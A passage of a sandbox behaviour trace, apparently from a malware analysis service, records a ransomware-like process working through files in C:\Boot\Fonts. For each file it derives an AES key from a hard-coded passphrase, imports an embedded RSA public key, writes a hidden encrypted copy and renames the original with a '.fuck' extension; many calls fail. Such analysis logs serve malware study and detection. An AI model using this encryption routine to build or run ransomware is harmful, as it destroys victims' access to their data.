KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.441] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.441] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276bff8) returned 1 [0231.442] CryptImportPublicKeyInfo (in: hCryptProv=0x276bff8, dwCertEncodingType=0x1, pInfo=0x275ff70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x275ffa0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x275ffa8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x393f68) returned 1 [0231.442] CryptEncrypt (in: hKey=0x393f68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.442] CryptEncrypt (in: hKey=0x393f68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276baa8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276baa8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.442] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276baa8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.442] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2777ed0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2777ed0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.442] CryptEncrypt (in: hKey=0x394be8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2777ed0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2777ed0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.442] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2777ed0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.442] CloseHandle (hObject=0xffffffff) returned 1 [0231.442] CloseHandle (hObject=0xffffffff) returned 1 [0231.442] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), bFailIfExists=0) returned 0 [0231.442] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf", dwFileAttributes=0x0) returned 0 [0231.443] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf.gsg")) returned 0 [0231.443] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf.fuck")) returned 0 [0231.443] CryptDestroyHash (hHash=0x394d28) returned 1 [0231.443] CryptDestroyKey (hKey=0x394be8) returned 1 [0231.443] CryptReleaseContext (hProv=0x276ba20, dwFlags=0x0) returned 1 [0231.443] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.443] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.455] GetLastError () returned 0x5 [0231.455] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf")) returned 0x20 [0231.456] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf", dwFileAttributes=0x80) returned 0 [0231.456] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.457] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.457] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf.gsg", dwFileAttributes=0x2) returned 0 [0231.457] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.459] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.459] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.459] CryptHashData (hHash=0x394a68, pbData=0x2ec800, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.460] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x394a68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.460] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.460] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.460] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276ba20) returned 1 [0231.460] CryptImportPublicKeyInfo (in: hCryptProv=0x276ba20, dwCertEncodingType=0x1, pInfo=0x2760a00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2760a30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2760a38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394168) returned 1 [0231.460] CryptEncrypt (in: hKey=0x394168, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.460] CryptEncrypt (in: hKey=0x394168, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276bbb8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276bbb8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.461] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276bbb8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.461] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2777ed0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2777ed0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.461] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2777ed0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2777ed0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.461] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2777ed0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.461] CloseHandle (hObject=0xffffffff) returned 1 [0231.461] CloseHandle (hObject=0xffffffff) returned 1 [0231.461] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), bFailIfExists=0) returned 0 [0231.461] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf", dwFileAttributes=0x0) returned 0 [0231.462] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf.gsg")) returned 0 [0231.462] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf.fuck")) returned 0 [0231.462] CryptDestroyHash (hHash=0x394a68) returned 1 [0231.462] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.462] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.462] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.462] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.462] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.462] GetLastError () returned 0x5 [0231.462] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf")) returned 0x20 [0231.463] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf", dwFileAttributes=0x80) returned 0 [0231.463] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.463] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.464] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf.gsg", dwFileAttributes=0x2) returned 0 [0231.464] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.466] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.466] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.466] CryptHashData (hHash=0x394be8, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.466] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x394be8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.466] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.466] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.466] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276ad60) returned 1 [0231.467] CryptImportPublicKeyInfo (in: hCryptProv=0x276ad60, dwCertEncodingType=0x1, pInfo=0x2760ad0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2760b00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2760b08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394228) returned 1 [0231.467] CryptEncrypt (in: hKey=0x394228, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.467] CryptEncrypt (in: hKey=0x394228, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276aef8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276aef8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.467] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276aef8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.467] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27782d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x27782d8, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.467] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27782d8*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x27782d8*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.467] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27782d8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.467] CloseHandle (hObject=0xffffffff) returned 1 [0231.467] CloseHandle (hObject=0xffffffff) returned 1 [0231.468] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), bFailIfExists=0) returned 0 [0231.468] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf", dwFileAttributes=0x0) returned 0 [0231.468] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf.gsg")) returned 0 [0231.468] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf.fuck")) returned 0 [0231.469] CryptDestroyHash (hHash=0x394be8) returned 1 [0231.469] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.469] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.469] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.469] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.469] GetLastError () returned 0x5 [0231.469] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf")) returned 0x20 [0231.469] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf", dwFileAttributes=0x80) returned 0 [0231.469] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.470] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.470] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf.gsg", dwFileAttributes=0x2) returned 0 [0231.470] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.472] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.472] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.472] CryptHashData (hHash=0x394a68, pbData=0x2ec828, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.472] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x394a68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.472] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.473] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.473] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276a458) returned 1 [0231.473] CryptImportPublicKeyInfo (in: hCryptProv=0x276a458, dwCertEncodingType=0x1, pInfo=0x2760ba0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2760bd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2760bd8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x393fe8) returned 1 [0231.473] CryptEncrypt (in: hKey=0x393fe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.473] CryptEncrypt (in: hKey=0x393fe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276a9a8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276a9a8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.473] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276a9a8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.473] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27782d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x27782d8, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.473] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27782d8*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x27782d8*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.473] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27782d8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.474] CloseHandle (hObject=0xffffffff) returned 1 [0231.474] CloseHandle (hObject=0xffffffff) returned 1 [0231.474] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), bFailIfExists=0) returned 0 [0231.474] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf", dwFileAttributes=0x0) returned 0 [0231.474] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf.gsg")) returned 0 [0231.474] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf.fuck" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf.fuck")) returned 0 [0231.475] CryptDestroyHash (hHash=0x394a68) returned 1 [0231.475] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.475] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.475] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.475] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.475] GetLastError () returned 0x5 [0231.475] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf")) returned 0x20 [0231.475] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf", dwFileAttributes=0x80) returned 0 [0231.475] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.476] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.476] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf.gsg", dwFileAttributes=0x2) returned 0 [0231.476] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.478] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.478] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.478] CryptHashData (hHash=0x394a68, pbData=0x2ec828, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.478] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x394a68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.479] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.479] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.479] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276b1a0) returned 1 [0231.480] CryptImportPublicKeyInfo (in: hCryptProv=0x276b1a0, dwCertEncodingType=0x1, pInfo=0x275f410*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x275f440*, 